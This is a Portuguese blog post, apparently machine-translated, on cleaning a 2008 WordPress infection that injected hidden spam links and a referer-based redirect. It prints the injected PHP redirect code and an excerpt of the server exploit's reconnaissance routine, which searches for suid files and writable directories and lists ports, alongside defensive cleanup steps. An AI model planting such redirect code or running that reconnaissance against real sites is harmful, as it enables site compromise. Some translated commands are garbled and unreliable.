Blogosfera viralizada… mas, o que você teve comigo?!

No último mês, continuei recebendo avisos de vírus no blog de alguns visitantes. Inicialmente, ignorei os avisos porque tinha um antivírus bastante bom instalado (Kaspersky AV 2009) e embora tenha passado muito tempo no blog, nunca recebi o alerta de vírus (.. há um tempo vi algo suspeito, que desapareceu na primeira atualização. finalmente...).
Lentamente, lentamente, grandes variações começaram a aparecer tráfego de visitantes, depois do que ultimamente o tráfego diminuiu constantemente e começou a haver cada vez mais pessoas que me dizem isso StealthSettings.com isso é Virusat. Ontem recebi de alguém uma captura de tela tirada quando o antivírus bloqueou uma script de stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Foi suficientemente convincente para mim, que comecei a procurá-lo em todas as fontes. A primeira ideia que me veio à cabeça foi fazer atualizar para a versão mais recente do WordPress (2.5.1), mas não antes de excluir todos os arquivos de script antigos do WordPress e fazer backup de banco de dados. Este procedimento não deu nenhum resultado e provavelmente teria demorado muito para descobrir onde estava o bug, se ele não tivesse me contado Eugênio em uma discussão durante o café, que ele descobriu um link no Google e seria bom ver isso.
MyDigitalLife.info, publicou um artigo com o título: "Hack de WordPress: recupere e corrija o Google e o mecanismo de pesquisa ou nenhum tráfego de cookies redirecionado para Your-Needs.info, AnyResults.Net, Golden-Info.net e outros sites ilegais”, que é o fim do tópico que eu precisava.
É sobre um explorar por WordPress baseado em cookies, que na minha opinião é muito complexo e feito conforme o livro. Inteligente o suficiente para fazer um Injeção SQL no banco de dados do blog, Assim, para criar um usuário invisível a uma simples verificação de rotina de Painel->Usuários, Assim, para verificar os diretórios e arquivos "graváveis" no servidor (que possuem chmod 777), para pesquisar e executar arquivos com privilégios de grupo ou até mesmo de root. Não sei o nome da exploração e vejo que existem poucos artigos escritos sobre ela, apesar de existirem muitos blogs infectados, inclusive da Romênia. Ok... vou tentar explicar generalidades sobre esse vírus.

O que o vírus faz?

Em primeiro lugar, insere nas fontes das páginas dos blogs, links invisíveis para os visitantes, mas visíveis e indexáveis ​​para os motores de busca, especialmente o Google. Desta maneira transferir o Page Rank para sites indicados pelo invasor. Em segundo lugar, é inserido mais um código de redirecionamento URL, para visitantes que vêm do Google, Live, Yahoo, ... ou de um leitor RSS e não possuem o site em biscoito. E antivírus detecta esse redirecionamento como Trojan-Clicker.HTML.

Sintomas:

A queda massiva no tráfego de visitantes, especialmente em blogs onde a maioria dos visitantes vem do Google.

Identificar: (é aí que o problema fica complicado para quem não entende muito de phpmyadmin, php e linux)

O. CUIDADOSO!!! PRIMEIRO FAÇA UM BACKUP DO BANCO DE DADOS!!!

1. Verifique as fontes dos arquivos index.php, Assim, cabeçalho.php, Assim, rodapé.php, do tópico do blog e veja se existe um código que usa criptografia base64 ou contém "if($ser=="1? && sizeof($_COOKIE)==0)” no formato:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

...ou algo semelhante. Exclua este código!

Clique e imagine…

index code

Na captura de tela acima, selecionei por engano "<?php get_header(); ?>Esse código deve permanecer.

2. Uso phpmyadmin e vá para a tabela no banco de dados wp_users, onde você verifica se existe um usuário sem nome, criado em 00:00:00 0000-00-00 (é possível no campo usuário_login escreva "WordPress". Anote o ID deste usuário (campo ID) e exclua-o.

Clique e imagine…

fake user

*aquele que está na linha verde, seu ID deve ser excluído e mantido. No caso dele com sono, era ID = 8 .

3. Vá para a mesa wp_usermeta, onde você tem que localizado você é EXCLUIR as linhas relacionadas ao ID (onde no campo ID do usuário o valor do ID excluído aparece).

4. Na mesa opção wp_, entre plugins_ativos e veja qual plugin está ativado de forma suspeita. Pode usar finais como _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc. combinações de extensões de imagem falsas com _old e _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Exclua este plugin e vá para o blog –> Painel -> Plugins, onde você desativa e ativa um determinado plugin.

Clique na imagem para ver como o arquivo infectado aparece em active_plugins.

plugin

Siga o caminho FTP ou SSH indicado em active_plugins e exclua o arquivo do servidor.

5. Também no phpMyAdmin, na tabela opção wp_, encontre e exclua a linha que contém "rss_f541b3abd05e7962fcab37737f40fad8"e vire"links_internos_cache”.
Em internal_links_cache, os links de spam que aparecem no blog e um Código do Google Adsense, do hacker.

6. É recomendado que você alterar a senha de entrar no blog e assim remova todos os usuários suspeitos. Atualize para a versão mais recente do WordPress e configure o blog para não permitir mais o cadastro de novos usuários. Não há perda... mesmo quem não está logado pode comentar.

Tentei explicar acima o quanto, o que fazer em tal situação, para limpar o blog desse vírus. O problema é muito mais grave do que parece e não está longe de ser resolvido, porque são utilizados vulnerabilidades de segurança do servidor de hospedagem onde está o blog.

Como primeira medida de segurança, quem tem acesso Ssh, para fazer algumas verificações no servidor para ver se ainda existem arquivos como *_old* e *_new.* com as terminações .gif, .jpeg, .pngg, .jpgg. Esses arquivos devem ser excluídos. Se renomearmos um arquivo, por ex. top_right_old.giff em top_right_old.php, vemos que o arquivo contém exatamente o código de exploração do servidor.

Algumas dicas úteis para verificar, limpar e proteger o servidor. (via SSH)

1. cd/tmp e verifique se existem tais pastas tmpVFlma ou outras combinações de nomes semelhantes e exclua-o. Você pode ver na imagem abaixo duas dessas pastas para mim:

tmpserver

rm –rf pasta numérica

2. Verifique e elimine (altere o chmod) tanto quanto possível as pastas com atributos chmod 777

encontre todos os arquivos graváveis ​​no diretório atual: encontrar . -tipo f -perm -2 -ls
encontre todos os diretórios graváveis ​​no diretório atual: encontrar . -tipo d -perm -2 -ls
encontre todos os diretórios e arquivos graváveis ​​no diretório atual: encontrar . -perm -2 –ls

3. Procure arquivos suspeitos no servidor.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, CUIDADOSO!!! para os arquivos que definem o bit SUL e Patim. Esses arquivos são executados com os privilégios do usuário (grupo) ou root, não com os do usuário que executa o arquivo. Esses arquivos podem comprometer o root se houver problemas de segurança. Se você não usa arquivos com bits SUID e SGID, execute “chmod 0” neles ou desinstale o pacote que os contém.

A exploração contém algum lugar na fonte...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

...praticamente desta forma ele encontra falhas de segurança. Portas abertas, diretórios "graváveis" e execução de arquivos com privilégios de grupo/root.

Voltarei com detalhes...

Alguns blogs infectados: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiologia.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... e a lista pode continuar... muito.

Você pode verificar se um blog está infectado usando o mecanismo de busca Google. cópia & colar:

site: www.blegoo.com comprar

Boa noite e bom trabalho ;) Em breve acho que o Eugen virá com novidades, no prevezibil.imprevizibil.com.

brb :)

EM: ATENÇÃO! Alterar o tema do WordPress ou atualizar para o WordPress 2.5.1 NÃO é uma solução para se livrar deste vírus.

Apaixonado por tecnologia, escrevo com prazer no StealthSetts.com começando em 2006. Tenho uma rica experiência em sistemas operacionais: macOS, Windows e Linux, mas também em linguagens de programação e plataformas de blog (WordPress) e para lojas on -line (Woocommerce, Magento, Presashop).

Lar Sua fonte de tutoriais de TI, dicas e notícias úteis. Blogosfera viralizada… mas, o que você teve comigo?!
Deixe um comentário